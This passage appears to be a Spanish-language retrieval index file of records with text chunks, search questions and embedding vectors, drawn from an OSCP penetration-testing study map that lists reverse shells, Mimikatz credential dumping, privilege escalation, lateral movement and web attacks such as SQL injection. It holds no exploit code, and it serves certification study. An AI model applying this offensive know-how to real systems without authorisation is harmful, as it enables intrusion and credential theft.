0.03681, -0.01972, -0.02036, 0.0331, -0.06616, -0.04265, -0.0526, 0.10245, 0.01528, -0.03394, 0.06486, -0.1004, -0.02908, 0.04607, -0.0111, -0.01297, -0.08326, -0.01256, 0.01518, 0.08649, 0.12483, 0.01283, 0.0614, -0.05018, -0.00807, 0.06892, 0.07641, 0.05081, -0.05108, 0.05054, -0.02072, -0.04095, 0.01508, 0.03812, 0.02723, -0.00473, -0.05346, -0.05988, 0.05904, 0.05024, -0.03553, -0.02718, 0.05133, -0.03982, -0.03467, 0.05787, -0.01419, -0.06079, -0.00148, -0.02243, 0.04192, -0.04481, 0.00324, -0.09142]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "# πŸ—ΊοΈ OSCP β€” Mapa Central (MOC)\n\n> Nota hub del vault. Desde aquΓ­ salen todos los caminos.\n> Origen: apuntes propios en `tu carpeta` + material de un laboratorio.", "indexar": "como organizo de forma eficiente los caminos o rutas de aprendizaje en un vault personal?", "v": [0.26995, 0.00735, -0.19422, -0.10724, 0.08457, -0.03, 0.0499, 0.00727, -0.07154, -0.16636, -0.04081, -0.14209, 0.04277, 0.09376, 0.05342, 0.03288, 0.13542, -0.03814, -0.16134, -0.03802, -0.14798, -0.12434, 0.01797, 0.12821, 0.04971, -0.0447, 0.14854, -0.02813, 0.00411, 0.10355, 0.04781, 0.16758, 0.09835, -0.15709, 0.02149, -0.07421, -0.09044, 0.0677, -0.08916, 0.01091, -0.10093, 0.07575, -0.04747, 0.09431, 0.03138, 0.01698, -0.10166, -0.00207, 0.00107, -0.01508, -0.03856, -0.07601, -0.019, -0.08894, 0.07522, -0.00774, -0.0344, -0.02574, 0.01949, -0.06201, 0.00531, -0.04544, 0.03065, 0.07688, 0.12216, -0.00435, 0.01633, -0.01831, -0.07116, 0.01065, -0.01794, -0.00456, 0.0496, 0.04027, 0.00864, 0.07358, 0.05967, 0.11192, 0.072, 0.06588, 0.09504, -0.05386, -0.07527, 0.02487, -0.0634, 0.00255, 0.05739, -0.01509, 0.08684, -0.01265, -0.06689, 0.1166, 0.05829, 0.00174, -0.07559, 0.03818, -0.01858, 0.00498, 0.05024, 0.02035, -0.06603, -0.0242, -0.02652, 0.04332, -0.01722, 0.04759, -0.0368, -0.00719, 0.01832, 0.04804, 0.06296, 0.05469, 0.00669, 0.00444, 0.02876, -0.02629, -0.01298, -0.05142, -0.01677, -0.1004, -0.07991, 0.03106, -0.07206, 0.00463, -0.01565, 0.02018, -0.03171, 0.10436, 0.09993, 0.02797, 0.00182, -0.02713, -0.07638, -0.01037, 0.00751, 0.01944, -0.04143, 0.03069, 0.01726, -0.1169, 0.03735, -0.01939, -0.08317, -0.14461, 0.02746, 0.00942, 0.02986, -0.04495, -0.10153, 0.02642, -0.07843, -0.00741, 0.07683, 0.01268, 0.06288, -0.00315, -0.0339, -0.07906, -0.00204, 0.09885, 0.0078, 0.12171, -0.00428, 0.03697, 0.04724, -0.03844, 0.01182, 0.05697, -0.02818, -0.02368, -0.05171, 0.01447, -0.00505, -0.09927, -0.0349, -0.02542, -0.09858, -0.05289, 0.0717, 0.07823, -0.00932, 0.01269, -0.03409, -0.02296, -0.04645, -0.04346, 0.03085, 0.01431, 0.06052, 0.00331, 0.00398, -0.0042, 0.02305, -0.04684, -0.08599, -0.07757, -0.006, 0.03178, 0.0052, 0.01534, -0.03941, -0.03718, -0.00804, -0.01719, -0.00117, -0.01825, -0.04188, 0.03814, 0.00844, 0.00672, 0.09191, -0.01973, 0.08816, -0.05759, -0.02907, -0.0088, 0.00977, -0.06579, -0.03592, 0.03887, -0.02916, 0.08237, 0.0211, -0.05746, 0.01209, 0.0175, -0.02594, 0.05143, 0.00871, 0.01485, -0.00197, 0.00085, -0.03176, -0.01758, 0.03312, 0.00596, -0.01304, -0.00259, -0.06964, -0.06764, 0.01332, 0.0209, -0.00479, -0.01551, -0.02027, -0.07124, -0.07351, 0.04717, 0.00101, -0.10619, -0.00157, 0.00117, 0.07402, 0.05907, -0.01122, -0.09327]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "## La espina dorsal\nLa MetodologΓ­a OSCP es lo ΓΊnico que de verdad importa. Todo lo demΓ‘s cuelga de ella:\n\n```\nEnumeraciΓ³n β†’ vector β†’ foothold (Reverse shell) β†’\nPrivesc Linux / Privesc Windows β†’ loot (Mimikatz) β†’\nMovimiento lateral / Active Directory β†’ documentar (Reporte OSCP)\n```", "indexar": "ΒΏquΓ© tΓ©cnica me sirve para obtener acceso inicial a un sistema?", "v": [-0.1589, 0.12026, -0.11023, -0.13241, 0.08791, -0.18434, -0.08166, -0.15785, -0.05133, 0.02152, -0.1487, -0.07938, -0.01479, -0.02152, 0.1195, -0.01353, 0.12627, -0.12285, 0.11041, 0.00278, -0.01955, -0.02864, -0.1187, -0.10431, -0.09389, -0.01415, 0.03296, -0.13202, -0.13839, -0.08428, 0.02428, -0.01087, 0.05027, -0.05371, -0.06654, -0.07039, 0.08887, 0.09578, 0.0608, -0.00104, -0.01028, -0.07842, 0.0049, -0.005, 0.19609, -0.04125, 0.12771, 0.10193, -0.04953, 0.03678, 0.00501, 0.05179, -0.09746, -0.06764, -0.06878, -0.0521, 0.10256, -0.04113, 0.01088, -0.05327, -0.02725, -0.062, 0.00597, -0.02664, 0.06113, -0.11128, -0.01723, -0.02966, -0.01013, 0.02888, -0.00108, -0.00959, 0.06772, -0.03343, -0.03732, 0.05941, -0.01404, 0.00825, 0.09955, -0.03732, -0.00753, 0.07067, -0.11772, -0.02857, 0.03066, -0.03598, 0.06873, -0.00091, 0.00781, -0.17847, 0.09448, 0.00319, 0.04041, -0.01169, 0.06123, -0.00585, -0.06996, -0.00477, -0.15702, -0.01466, 0.01836, -0.06787, -0.07167, 0.05495, -0.05024, -0.03633, 0.05582, -0.08658, -0.01573, -0.08451, -0.10722, 0.09415, -0.0651, 0.06251, -0.10597, 0.00728, 0.03302, -0.05214, -0.09905, 0.04069, -0.02331, 0.04714, 0.00695, -0.06622, 0.09927, -0.05376, 0.02414, 0.01187, -0.00978, 0.07417, 0.03337, -0.03441, -0.04791, -0.01763, -0.0332, -0.07703, 0.05652, -0.01771, 0.00109, 0.02936, 0.00499, 0.06124, -0.06042, -0.07469, -0.0123, -0.01968, 0.17457, -0.11774, 0.00044, -0.11138, -0.07048, -0.03582, -0.02228, 0.00085, -0.0473, -0.06189, 0.035, -0.06816, -0.05804, 0.03043, 0.02598, 0.05567, 0.00245, -0.01504, -0.07517, -0.02284, -0.03663, -0.09831, 0.04758, 0.03936, -0.00237, -0.00535, 0.0087, -0.0116, 0.00115, 0.0199, -0.04744, -0.08971, -0.00647, -0.00051, -0.04339, 0.01988, 0.03298, -0.01123, 0.04957, 0.04894, -0.058, 0.01669, 0.00085, 0.05561, -0.0059, -0.01456, -0.03296, -0.02585, -0.01995, -0.00204, -0.03974, -0.04701, -0.01143, 0.03445, -0.01012, 0.0528, 0.01221, -0.03391, 0.03821, 0.03289, 0.0554, -0.06422, -0.02675, 0.04703, -0.02318, 0.04124, 0.07678, 0.02413, -0.04847, -0.0118, -0.0703, 0.01791, -0.00543, -0.06538, 0.00122, -0.01383, 0.0096, 0.09858, 0.01837, -0.06322, 0.01132, 0.0208, -0.05136, -0.04744, 0.01339, -0.09032, 0.02312, 0.03537, 0.01474, -0.10804, -0.0346, -0.02564, -0.01302, -0.03626, 0.0495, 0.06946, 0.02715, -0.00551, -0.00828, -0.03875, -0.04572, -0.03135, -0.04439, -0.03956, -0.02113, -0.00662, -0.00432, 0.02861, 0.032, -0.01874]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "## La espina dorsal\nLa MetodologΓ­a OSCP es lo ΓΊnico que de verdad importa. Todo lo demΓ‘s cuelga de ella:\n\n```\nEnumeraciΓ³n β†’ vector β†’ foothold (Reverse shell) β†’\nPrivesc Linux / Privesc Windows β†’ loot (Mimikatz) β†’\nMovimiento lateral / Active Directory β†’ documentar (Reporte OSCP)\n```", "indexar": "con quΓ© herramienta puedo leer contraseΓ±as en memoria de Windows?", "v": [0.02385, 0.09056, -0.07213, -0.19726, -0.02654, -0.05885, -0.10146, -0.00703, -0.0771, -0.13275, -0.03477, 0.03959, 0.00797, -0.10538, 0.00223, 0.08188, 0.13669, -0.01339, -0.01398, 0.01819, -0.0203, -0.07965, -0.13339, 0.08532, -0.06382, -0.01554, 0.07636, 0.02924, -0.10493, 0.05027, -0.03853, 0.03904, 0.08126, -0.03941, -0.07086, 0.14488, -0.02333, 0.14141, 0.03802, 0.1022, 0.06969, 0.15567, -0.06625, 0.13604, 0.08763, -0.0555, 0.00947, -0.00293, 0.09131, -0.00854, -0.07731, -0.11827, -0.00297, -0.07819, 0.07461, -0.10246, 0.18809, -0.02232, 0.03245, -0.03437, -0.11719, 0.11428, -0.02106, 0.07575, -0.00109, -0.03572, 0.08351, -0.00477, -0.06066, 0.21383, -0.0942, -0.02704, 0.01532, 0.01993, 0.03454, 0.0608, 0.03951, 0.01578, 0.08548, 0.07263, -0.01564, -0.00996, -0.02952, -0.08017, -0.01234, -0.01912, 0.00149, -0.00288, 0.08996, -0.12019, 0.02543, 0.05122, -0.07934, 0.13355, 0.0468, -0.05634, 0.03089, 0.01253, -0.04502, 0.03157, 0.02728, -0.0448, -0.04052, 0.15586, 0.00128, 0.01541, -0.07318, -0.00796, -0.0744, -0.09296, 0.08391, 0.03129, -0.06418, -0.00488, -0.05043, 0.05046, 0.0568, -0.06747, 0.05603, 0.01604, -0.01305, -0.00892, -0.07188, -0.0066, 0.03324, 0.03117, -0.04485, 0.08562, -0.11347, -0.08956, 0.03263, 0.02614, -0.06528, -0.0687, -0.02826, 0.08279, 0.00427, -0.05836, -0.02228, -0.06049, 0.06072, 0.02511, 0.00497, -0.0454, -0.03603, 0.07604, 0.09643, 0.06653, -0.04955, -0.03563, 0.03173, -0.05939, 0.04845, 0.02404, -0.03338, 0.03545, -0.01927, 0.01278, -0.06178, 0.07274, -0.07917, -0.00806, -0.03002, 0.01308, -0.03791, -0.07522, -0.02121, 0.10256, 0.08147, 0.04017, 0.00039, -0.00978, 0.02734, -0.0285, -0.00018, -0.05443, -0.04211, -0.03916, -0.0209, -0.08159, -0.07493, -0.02249, -0.03672, -0.03271, -0.00891, -0.09026, 0.03445, 0.0089, -0.01909, -0.00878, -0.02873, -0.01366, 0.06721, -0.03557, 0.04645, -0.03949, -0.05767, -0.03047, 0.04899, 0.00038, -0.04899, 0.04921, -0.05482, -0.03023, 0.08142, 0.08923, -0.07566, 0.0078, -0.00032, 0.01854, 0.0265, -0.01438, -0.00769, -0.06107, -0.05697, -0.06516, -0.02692, 0.02706, -0.04454, -0.0369, 0.07057, 0.04365, 0.09337, 0.02131, -0.06013, -0.03658, -0.0453, 0.03623, 0.00216, -0.01397, 0.00257, 0.03829, -0.02934, 0.00156, 0.07997, -0.02284, -0.04978, -0.06309, -0.05034, 0.0269, -0.06589, 0.03691, -0.02701, -0.0586, -0.10873, -0.05053, 0.0102, 0.01966, 0.00523, -0.08419, -0.04811, 0.01008, 0.04529, -0.03535, -0.02434, -0.01007]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "## La espina dorsal\nLa MetodologΓ­a OSCP es lo ΓΊnico que de verdad importa. Todo lo demΓ‘s cuelga de ella:\n\n```\nEnumeraciΓ³n β†’ vector β†’ foothold (Reverse shell) β†’\nPrivesc Linux / Privesc Windows β†’ loot (Mimikatz) β†’\nMovimiento lateral / Active Directory β†’ documentar (Reporte OSCP)\n```", "indexar": "cual es el mejor programa para movernme lateralmente entre servidores en una red corporativa?", "v": [-0.07302, -0.0415, -0.04373, -0.2145, -0.07212, -0.11888, 0.11772, 0.03426, -0.09923, -0.18824, -0.14867, -0.04715, 0.06317, -0.12431, 0.03017, 0.12785, 0.10545, -0.09982, 0.0007, 0.04488, 0.06409, -0.03024, 0.04122, -0.00407, 0.07831, 0.09131, 0.13975, -0.10256, -0.01968, 0.02209, 0.03033, -0.00823, 0.08261, -0.01475, 0.02662, -0.00057, -0.00579, 0.02986, -0.04723, 0.08177, 0.03979, 0.03929, -0.14008, 0.02002, 0.10575, 0.02281, -0.06213, -0.02611, 0.0238, 0.00012, -0.02746, 0.04516, 0.01786, -0.07881, -0.00514, -0.01209, -0.00909, -0.05967, -0.07913, -0.01044, -0.00767, 0.10681, -0.1015, 0.04952, 0.00257, -0.07506, 0.04214, -0.14126, -0.12632, -0.07298, -0.00031, 0.02173, -0.07168, -0.03392, -0.01715, 0.11213, -0.02541, -0.05863, 0.07531, 0.05187, 0.07089, 0.12123, -0.05522, 0.1092, -0.12277, -0.06152, -0.00494, -0.02715, 0.00884, 0.05349, 0.07495, -0.02686, -0.07866, 0.09944, -0.03366, -0.00299, 0.12471, -0.03197, -0.03772, 0.03603, 0.00597, 0.01824, -0.08004, -0.03477, -0.09973, 0.06364, 0.01489, -0.09215, 0.0462, 0.00897, 0.07003, -0.03763, -0.03299, 0.04698, -0.03769, -0.09126, -0.03056, -0.0444, 0.01939, 0.01549, -0.04524, -0.02413, -0.01464, 0.0046, 0.04587, -0.07779, 0.03566, 0.05685, -0.05438, 0.04948, -0.05128, -0.02369, -0.05609, -0.07449, -0.1447, -0.04071, 0.1296, 0.00651, 0.06885, -0.06329, -0.01405, 0.03948, -0.03514, 0.00153, 0.09233, 0.08915, 0.16007, -0.02905, -0.01482, 0.15236, -0.03277, -0.0326, -0.03763, -0.0209, -0.09029, 0.03195, 0.00524, -0.00445, -0.11293, 0.08626, 0.00948, -0.00012, -0.08555, 0.05246, 0.03441, -0.04745, -0.03918, 0.07444, 0.10124, 0.07, -0.01861, 0.02401, -0.03657, -0.062, -0.00185, -0.00801, -0.09216, -0.09221, 0.08751, -0.00279, -0.02706, 0.0155, 0.05234, 0.0247, -0.03752, -0.06148, -0.02693, 0.02559, -0.01203, -0.03517, -0.02893, 0.00038, -0.03977, 0.0143, 0.06858, -0.06389, -0.00136, -0.05351, 0.02473, -0.04385, -0.08493, -0.08251, -0.04614, 0.02239, 0.03858, 0.0653, 0.00389, 0.06251, 0.02991, 0.08728, -0.00844, -0.00569, 0.06652, -0.00926, -0.08677, -0.05403, 0.02182, -0.01956, 0.03509, 0.00187, 0.04592, -0.0394, 0.03863, -0.02507, -0.05174, -0.00465, -0.00345, -0.0067, -0.06362, -0.0021, 0.02359, 0.05449, 0.03788, -0.01647, -0.02003, 0.00447, 0.05353, -0.0297, 0.02149, -0.09775, -0.01754, 0.03967, -0.05925, -0.0811, -0.0246, -0.04086, -0.07293, 0.00035, -0.02827, 0.00415, -0.00791, 0.00887, 0.03425, -0.04936, 0.02477, 0.04445]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🧭 MetodologΓ­a y examen\n- MetodologΓ­a OSCP Β· Estructura del examen Β· GestiΓ³n del tiempo\n- Reporte OSCP Β· Reglas de herramientas", "indexar": "que programa hay para montar el examen OSCP", "v": [-0.07044, -0.0578, -0.05538, -0.24764, -0.07164, -0.1594, 0.04047, 0.07082, -0.1723, -0.06965, -0.03584, 0.05674, 0.00702, -0.04156, 0.01501, 0.10292, 0.05567, -0.03156, 0.05586, 0.02766, -0.0716, -0.01267, -0.03191, 0.0387, 0.06972, 0.16613, -0.1016, -0.06261, 0.00588, -0.07636, 0.06282, 0.13033, 0.04014, -0.04832, 0.00887, -0.02006, -0.0018, -0.15649, 0.03832, 0.1016, 0.00379, 0.00052, 0.04668, 0.11144, 0.09103, -0.00984, 0.13277, 0.10688, -0.02771, -0.12983, 0.06648, -0.01489, 0.00723, -0.02628, 0.00079, -0.05701, -0.05625, -0.02438, 0.07052, -0.05104, 0.08612, 0.09213, -0.02199, -0.06159, 0.07377, -0.00508, 0.01293, 0.06289, -0.15147, 0.01655, -0.04874, -0.00292, -0.03165, 0.0079, -0.08584, -0.07718, -0.02166, -0.05438, 0.16423, -0.07737, 0.02151, -0.05485, 0.06881, 0.18009, -0.11086, -0.05532, 0.01771, -0.01689, -0.04435, 0.01038, 0.01273, 0.10286, 0.07251, 0.07368, 0.07184, -0.13221, 0.14197, 0.05325, 0.01273, -0.00909, -0.01879, 0.02411, -0.02428, 0.0836, -0.14108, 0.05745, 0.10042, -0.00849, 0.02255, 0.04986, 0.00806, 0.05535, -0.078, 0.0105, -0.11477, -0.12387, 0.05357, 0.04017, -0.00573, -0.03793, -0.06286, 0.11996, -0.00246, 0.04627, 0.07369, 0.01795, 0.10952, 0.11355, -0.043, 0.06185, 0.03039, -0.0134, -0.06444, -0.00257, -0.10171, -0.09649, -0.06523, -0.07144, 0.02031, -0.01802, 0.01343, 0.05341, 0.02488, -0.03256, 0.00906, 0.02131, -0.02677, -0.07111, -0.0017, 0.01505, 0.00488, 0.04205, 0.01449, 0.03341, -0.08269, -0.05583, 0.01976, 0.02249, 0.03815, 0.07177, -0.04631, -0.04406, -0.02596, -0.03286, 0.05708, 0.0213, -0.03548, 0.02615, 0.04604, 0.02061, -0.01655, 0.03706, 0.03685, -0.02468, 0.06953, 0.02771, 0.03531, -0.04454, 0.01677, -0.01744, -0.12452, 0.03047, 0.06923, 0.0439, 0.01486, 0.02726, 0.01588, 0.04219, 0.05594, -0.02895, 0.01292, -0.02565, -0.04004, -0.00264, 0.03478, -0.01384, 0.02371, -0.03667, 0.05661, -0.01364, -0.08144, -0.04948, 0.0006, -0.04618, 0.0356, 0.0465, 0.03084, 0.07172, 0.061, 0.09352, -0.04431, -0.03493, 0.03034, -0.02072, 0.02942, 0.00776, 0.02397, 0.12151, -0.00632, 0.04323, -0.02046, -0.00271, 0.03809, 0.0753, -0.03495, -0.03296, 0.00158, 0.03694, 0.07034, 0.01169, 0.02512, -0.05416, 0.04767, -0.03461, 0.05115, 0.01326, 0.00817, 0.0238, -0.00265, -0.08122, -0.00898, 0.04158, 0.00761, -0.06775, -0.05986, 0.03335, 0.00701, -0.0395, 0.02847, -0.00864, -0.00902, -0.01263, -0.01152, -0.06212, -0.01385, 0.02729]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🧭 MetodologΓ­a y examen\n- MetodologΓ­a OSCP Β· Estructura del examen Β· GestiΓ³n del tiempo\n- Reporte OSCP Β· Reglas de herramientas", "indexar": "con que puedo preparar la metodologΓ­a del reporte OSCP", "v": [0.15323, 0.02728, -0.04498, -0.16565, 0.01237, -0.13237, 0.11349, 0.06388, -0.11831, -0.08125, -0.03898, -0.00848, 0.12978, -0.04584, -0.04345, 0.08299, 0.12195, 0.06063, 0.0023, -0.04845, -0.028, -0.14048, -0.12908, 0.0772, 0.13027, 0.10604, 0.10486, -0.01405, -0.07193, -0.1478, -0.06499, 0.05734, -0.04125, 0.06079, -0.0437, 0.08676, -0.0828, -0.10234, -0.14674, 0.06727, -0.10618, -0.10859, -0.03215, 0.09763, 0.21253, -0.06436, 0.02123, 0.07454, -0.04692, 0.00986, -0.02765, -0.09668, -0.09341, 0.01372, -0.13421, 0.01818, 0.00082, -0.05044, 0.05802, -0.03502, 0.05608, 0.05516, 0.0444, -0.13918, 0.10115, -0.02696, -0.04844, -0.01604, -0.1101, -0.0023, 0.02668, 0.04465, -0.06044, -0.06715, 0.01474, -0.05033, 0.00878, 0.12247, 0.14756, 0.00374, -0.03955, -0.05181, 0.00055, 0.10495, -0.11552, -0.0783, 0.04944, -0.02707, -0.02746, -0.1443, -0.02472, -0.02266, 0.0301, -0.02311, 0.11133, -0.07459, 0.1264, 0.05668, -0.03046, 0.04004, -0.003, 0.0321, 0.02302, 0.10628, -0.0358, 0.02956, 0.11727, 0.02604, 0.04575, -0.04856, -0.09023, 0.06258, -0.0429, 0.06367, -0.09414, -0.08074, 0.00622, 0.01849, -0.05876, -0.03921, -0.04202, 0.08835, -0.06472, 0.02829, 0.00553, -0.00837, 0.01557, 0.07915, 0.07251, 0.04381, 0.01313, -0.01944, -0.00608, 0.05997, 0.01001, -0.03133, -0.08051, -0.02935, 0.01116, -0.05813, 0.03934, 0.07196, 0.06115, -0.07155, 0.00517, -0.02775, -0.00897, -0.00957, -0.09916, -0.06122, 0.03238, 0.00487, -0.05484, -0.01048, -0.06177, -0.06106, 0.00562, -0.0057, -0.04841, 0.10163, 0.00612, -0.03111, 0.00358, -0.02471, 0.01292, -0.0111, 0.04308, -0.02204, 0.03648, -0.03045, -0.02155, 0.0278, 0.01637, -0.08068, 0.03349, -0.06207, -0.04963, -0.02658, 0.00813, 0.0021, -0.03738, 0.01296, -0.04792, -0.01915, 0.00156, 0.0308, 0.04366, -0.00224, 0.00778, 0.05479, -0.04456, 0.02428, 0.00899, -0.04488, -0.05236, -0.02192, 0.02144, 0.01201, 0.06194, 0.03564, -0.08878, 0.02732, -0.01035, -0.02291, 0.00291, 0.01147, -0.02638, 0.0967, -0.03059, 0.00806, 0.01768, -0.09081, 0.04907, -0.07814, 0.02529, 0.0273, -0.02006, -0.00157, -0.05731, 0.00235, 0.09196, -0.0002, 0.01499, 0.00878, 0.02702, 0.0457, 0.0112, -0.00881, -0.0043, 0.02856, -0.06959, 0.0273, -0.0078, -0.07126, 0.0571, 0.04232, 0.00047, -0.05902, -0.02368, -0.0114, 0.0347, -0.0106, 0.00969, -0.01077, -0.00524, -0.04933, -0.04211, 0.01449, 0.07303, -0.06155, 0.06295, 0.01485, 0.08533, -0.00539, -0.01593, -0.06487]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### πŸ” EnumeraciΓ³n\n- EnumeraciΓ³n (Γ­ndice) Β· Nmap Β· Nmap NSE Β· Puertos olvidados\n- SMB Β· SNMP Β· Netcat Β· RDP\n- EnumeraciΓ³n web Β· Content discovery Β· Vhosts y subdominios\n- searchsploit Β· Trampas de enumeraciΓ³n", "indexar": "que programa sirve para encontrar puertos abiertos en una red?", "v": [0.1471, -0.00453, -0.14436, -0.15564, 0.08236, -0.11021, 0.12489, -0.13604, -0.03309, -0.15319, -0.10477, -0.06731, 0.07977, -0.14059, 0.05424, -0.04763, -0.02155, -0.01265, 0.11113, 0.05246, -0.05208, 0.00931, -0.07338, -0.06289, 0.09072, 0.10625, 0.06716, -0.05472, -0.06141, 0.08581, 0.02415, -0.00206, 0.04666, -0.04086, -0.0045, -0.09621, 0.12001, 0.00854, 0.04574, 0.04507, 0.08043, 0.02962, -0.02723, -0.01486, 0.11092, -0.05436, 0.03633, -0.04388, -0.00547, 0.01144, -0.02023, -0.04947, -0.06647, -0.05682, 0.02655, -0.04806, -0.07131, 0.01429, -0.13618, -0.00453, -0.00812, 0.02666, 0.04503, -0.07315, 0.01681, -0.09524, 0.05504, 0.14306, -0.06422, 0.01569, -0.07455, 0.00128, -0.02703, 0.06871, -0.03905, -0.00528, -0.04896, -0.0186, 0.05381, 0.01942, 0.04684, 0.03058, 0.0281, -0.00687, 0.00083, -0.06953, -0.01426, -0.03835, -0.00238, -0.10672, 0.06199, 0.01927, 0.03924, 0.16843, 0.02127, -0.03112, 0.0305, 0.04758, 0.01102, 0.06402, 0.05941, 0.01757, -0.07353, 0.00296, -0.07436, 0.07799, 0.05568, -0.07922, 0.05109, 0.1161, 0.12678, -0.0486, 0.06615, -0.03181, -0.02965, -0.02733, 0.00634, -0.07662, 0.01443, -0.00901, -0.06153, -0.04608, -0.11594, 0.02638, 0.01122, -0.02393, -0.02567, 0.07956, 0.00447, 0.10191, 0.04826, 0.00086, -0.05988, -0.05898, -0.09426, -0.13288, 0.03201, -0.0916, 0.00994, -0.05469, -0.06825, 0.08121, -0.02755, -0.05596, 0.00777, 0.02588, 0.0403, -0.03405, -0.0221, -0.00794, -0.02115, 0.03776, -0.05511, 0.0232, -0.0707, 0.06271, 0.1256, -0.01321, -0.09289, 0.07567, -0.03216, 0.00478, -0.09303, -0.0658, 0.09158, -0.05421, -0.02903, 0.03975, 0.09509, 0.01857, -0.01427, 0.12994, -0.04221, -0.11022, -0.05173, -0.02088, -0.02417, -0.1399, -0.02339, -0.04756, -0.04558, 0.04213, -0.00182, -0.01366, -0.08326, -0.12116, -0.00349, -0.06705, -0.01719, 0.01858, -0.00078, -0.05467, -0.02372, -0.00509, -0.02504, 0.04247, 0.02169, 0.02472, -0.01404, -0.05869, -0.00595, 0.03863, 0.00879, -0.02182, 0.02925, 0.09897, -0.0538, 0.04248, 0.04678, 0.14483, -0.04665, 0.00216, 0.05182, 0.01498, -0.06176, -0.03067, -0.00914, 0.07528, 0.10759, 0.08052, -0.0095, -0.02497, -0.06009, 0.08824, 0.02251, -0.06238, 0.03917, -0.00325, 0.03421, 0.05757, 0.03716, -0.06868, -0.02422, -0.02716, -0.03047, -0.02747, -0.01522, 0.04974, 0.00444, -0.06139, -0.01323, 0.0149, -0.00742, -0.06469, 0.0835, -0.03691, -0.03086, 0.01313, 0.0409, -0.00929, -0.11084, 0.08398, -0.01073, -0.05146, 0.04446, 0.02838]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### πŸ” EnumeraciΓ³n\n- EnumeraciΓ³n (Γ­ndice) Β· Nmap Β· Nmap NSE Β· Puertos olvidados\n- SMB Β· SNMP Β· Netcat Β· RDP\n- EnumeraciΓ³n web Β· Content discovery Β· Vhosts y subdominios\n- searchsploit Β· Trampas de enumeraciΓ³n", "indexar": "con quΓ© puedo descubrir subdominios ocultos de un sitio web?", "v": [0.00144, 0.0121, -0.16862, 0.10018, 0.01557, -0.04225, -0.01481, -0.01443, 0.01652, -0.12358, -0.03988, -0.12611, -0.04638, -0.06419, -0.01233, -0.08078, 0.22012, -0.03784, -0.00233, -0.04668, 0.04275, -0.11982, -0.0754, -0.08216, 0.09168, -0.15893, 0.06365, 0.06816, -0.01447, -0.03288, -0.01632, 0.03806, -0.00527, 0.06204, -0.09992, -0.00616, 0.04344, -0.0367, 0.04317, -0.05115, 0.01634, -0.05091, -0.0517, 0.13152, -0.04869, 0.02061, -0.17395, -0.05172, -0.02236, -0.10279, -0.06469, -0.10454, -0.12681, -0.07111, -0.0208, -0.05499, 0.08839, -0.07479, 0.17752, 0.03089, 0.01079, 0.03467, 0.01987, 0.03787, 0.02063, -0.07842, -0.04459, 0.17428, -0.01574, 0.02262, 0.05812, -0.06039, 0.12374, 0.01836, 0.08694, 0.00806, 0.01256, -0.03344, 0.00367, 0.019, 0.02449, 0.1127, -0.00619, 0.07794, -0.10495, -0.09118, -0.10588, -0.04422, -0.07862, -0.13072, 0.1181, 0.04217, -0.03114, -0.0202, -0.06645, -0.07474, 0.04555, -0.0245, -0.07713, -0.00375, 0.00083, 0.04412, -0.12206, 0.10055, 0.06805, 0.12251, -0.045, -0.08025, -0.026, -0.0151, 0.06814, -0.04327, -0.15722, -0.02152, -0.05528, 0.06827, -0.00978, 0.0759, 0.0477, -0.0691, -0.0607, -0.01156, -0.06655, -0.00421, -0.03035, -0.02265, 0.01146, 0.0496, 0.0119, -0.04864, 0.01267, -0.02879, -0.05021, 0.0286, 0.00994, 0.00978, 0.06569, 0.04263, 0.04042, 0.01946, 0.03075, -0.09454, -0.07215, 0.0448, 0.06213, -0.03874, 0.03688, -0.02915, -0.07538, -0.04448, -0.08264, 0.04348, 0.01619, 0.00629, 0.00809, 0.01219, -0.02309, -0.02611, -0.05033, 0.03411, -0.03375, 0.07191, -0.00882, -0.0488, -0.05088, -0.02205, -0.11472, -0.00894, -0.02529, 0.02932, 0.00057, 0.08477, 0.01773, -0.13495, 0.01108, 0.00933, -0.03108, -0.04223, 0.07667, -0.02477, 0.03407, 0.04337, -0.02785, 0.05666, -0.10444, 0.01297, 0.06048, -0.1087, -0.05821, 0.03376, 0.04023, -0.06318, -0.0549, 0.02301, 0.01431, -0.01528, 0.03269, 0.06135, 0.04232, -0.05629, -0.05151, -0.02742, 0.01829, -0.02448, -0.0603, -0.0384, -0.04762, -0.00274, -0.00337, 0.00156, 0.05462, -0.10124, 0.03847, -0.13604, -0.02449, 0.02604, -0.02307, 0.00044, -0.11572, -0.00894, 0.03384, 0.01002, 0.04213, -0.00622, 0.06068, 0.0063, 0.0465, 0.04865, 0.01558, 0.07321, -0.0277, -0.05041, -0.07861, 0.03537, 0.0243, -0.00742, -0.00122, 0.02122, -0.06313, 0.07662, 0.00444, 0.03586, 0.06893, -0.00728, 0.03447, -0.08362, -0.05554, 0.00054, -0.03693, 0.02194, -0.01309, 0.02981, 0.0003, -0.04412, 0.03055, 0.02967]} +{"tipo": "pregunta", "herramienta": "OSCP MOC", "perfil": "PENTESTERS", "fichero": "conocimiento/OSCP MOC.md", "tema": "", "fuente": null, "licencia": null, "texto": "### 🌐 ExplotaciΓ³n web\n- Hacking web (Γ­ndice/metodologΓ­a) Β· Burp Suite Β· Burp Repeater e Intruder\n- SQL injection Β· Command injection Β· Directory traversal Β· LFI a RCE\n- File upload bypass Β· XSS Β· SSTI Β· Authentication attacks", "indexar": "quΓ© herramientas me sirven para hacer inyecciΓ³n SQL", "v": [0.02407, 